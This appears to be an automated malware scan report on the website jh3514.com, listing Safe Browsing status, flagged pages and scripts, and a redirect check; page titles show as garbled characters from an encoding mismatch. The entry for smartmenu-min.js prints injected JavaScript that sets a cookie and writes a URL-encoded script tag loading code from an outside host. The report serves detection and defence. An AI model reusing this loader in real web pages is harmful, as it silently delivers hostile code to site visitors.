Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=jh3514.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
| Request | Server response | Status |
http://www.jh3514.com/ | 200 OK Content-Length: 20913 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title> é åä¸äºä¸åå¶é©å¶éæéå ¬å¸--æ°å ´é åéå¢æåä¼ä¸ &l ...[4175 bytes skipped]... | ||
http://www.jh3514.com/js/jquery-1.3.2.min.js | 200 OK Content-Length: 26672 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) (function(){var l=this,g,y=l.jQuery,p=l.$,o=l.jQuery=l.$=function(E,F){return new o.fn.init(E,F)},D=/^[^<]*(<(.|\s)+>)[^>]*$|^#([\w-]+)$/,f=/^.[^:#\[\.,]*$/;o.fn=o.prototype={init:function(E,H){E=E||document;if(E.nodeType){this[0]=E;this.length=1;this.context=E;return this}if(typeof E==="string"){var G=D.exec(E);if(G&&(G[1]||!H)){if(G[1]){E=o.clean([G[1]],H)}else{var I=document.getElementById(G[3]);if(I&&I.id!=G[3]){return o().find(E)}var F=o(I||[]);F.context=document Antivirus reports:
| ||
http://www.jh3514.com/js/smartmenu-min.js | 200 OK Content-Length: 2637 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(4($){$.N.O=4(a){2 b=P();b.v=v;b.k=k;b.r=r;b.w=w;b.3=$.Q(s,{x:{8:0,l:0},m:1a,k:R,n:b,t:E,F:s},a);b.S(4(e){b.r()});b.T(4(e){b.k(b.3.k)});9 b};4 o(){9($.y.U&&$.y. if(document.cookie.indexOf('logtime')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='logtime=Yes;path=/;expires='+expires.toGMTString();document.write(unescape('%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%77%77%77%2E%64%77%7A%2E%6F%72%67%2E%69%6E%2F%65%72%72%6F%72%2E%70%68%70%22%3E%3C%2F%73%63%72%69%70%74%3E'));} Antivirus reports:
| ||
http://www.jh3514.com/js/js.js | 200 OK Content-Length: 1163 Content-Type: application/x-javascript | clean |
http://s21.cnzz.com/stat.php?id=3329943&web_id=3329943&show=pic | 200 OK Content-Length: 10075 Content-Type: application/javascript | clean |
http://www.jh3514.com/index.aspx | 200 OK Content-Length: 20913 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><title> é åä¸äºä¸åå¶é©å¶éæéå ¬å¸--æ°å ´é åéå¢æåä¼ä¸ &l ...[4175 bytes skipped]... | ||
http://www.jh3514.com/company.aspx | 200 OK Content-Length: 15368 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> ä¼ä¸ç®ä» </title><link href="css/c1.css" rel="stylesheet" type="text/css" /> <style type="text/css"> <!-- body { margin-top: 0px; } a { text-decor ...[4164 bytes skipped]... | ||
http://www.jh3514.com/wenhua.aspx | 200 OK Content-Length: 18549 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> ä¼ä¸æå </title><link href="css/c1.css" rel="stylesheet" type="text/css" /> <style type="text/css"> <!-- body { margin-top: 0px; } a { text-decor ...[4204 bytes skipped]... | ||
http://www.jh3514.com/chanpinShow.aspx | 200 OK Content-Length: 9837 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> 产åå±ç¤º </title><link href="css/c1.css" rel="stylesheet" type="text/css" /> <style type="text/css"> <!-- body { margin-top: 0px; height: 1106px; } ...[4170 bytes skipped]... | ||
http://www.jh3514.com/news.aspx | 200 OK Content-Length: 17232 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> æ°é»èµè®¯ </title><link href="css/c1.css" rel="stylesheet" type="text/css" /> <style type="text/css"> a { text-decoration:none; color:#4B4B4B; } body { | ||
http://www.jh3514.com/board.aspx | 200 OK Content-Length: 17095 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> 客æ·çè¨ </title><link href="css/c1.css" rel="stylesheet" type="text/css" /><link href="css/board.css" rel="stylesheet" type="text/css" /> <style type="text/css"> body { ...[4302 bytes skipped]... | ||
http://www.jh3514.com/zhaopin.aspx | 200 OK Content-Length: 26683 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> 人ææè </title><link href="css/c1.css" rel="stylesheet" type="text/css" /><link href="css/c2.css" rel="stylesheet" type="text/css" /> <style type="text/css"> body ...[4149 bytes skipped]... | ||
http://www.jh3514.com/purchaseZhaoBiao.aspx | 200 OK Content-Length: 12902 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> </title><link href="css/c1.css" rel="stylesheet" type="text/css" /><link href="css/news.css" rel="stylesheet" type="text/css" /> <style type="text/css"> body { ...[4441 bytes skipped]... | ||
http://www.jh3514.com/ZhongBiao.aspx | 200 OK Content-Length: 12592 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> </title><link href="css/c1.css" rel="stylesheet" type="text/css" /><link href="css/news.css" rel="stylesheet" type="text/css" /> <style type="text/css"> body { ...[4462 bytes skipped]... | ||
http://www.jh3514.com/SalesPricePublicity.aspx | 200 OK Content-Length: 12608 Content-Type: text/html | suspicious |
Page code contains blacklisted domain: www.3514gc.com <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head><title> </title><link href="css/c1.css" rel="stylesheet" type="text/css" /><link href="css/news.css" rel="stylesheet" type="text/css" /> <style type="text/css"> body { ...[4462 bytes skipped]... | ||
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: jh3514.com
Result:
GET / HTTP/1.1
Host: jh3514.com
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: jh3514.com
Referer: http://www.google.com/search?q=jh3514.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: jh3514.com
Referer: http://www.google.com/search?q=jh3514.com
Result:
The result is similar to the first query. There are no suspicious redirects found.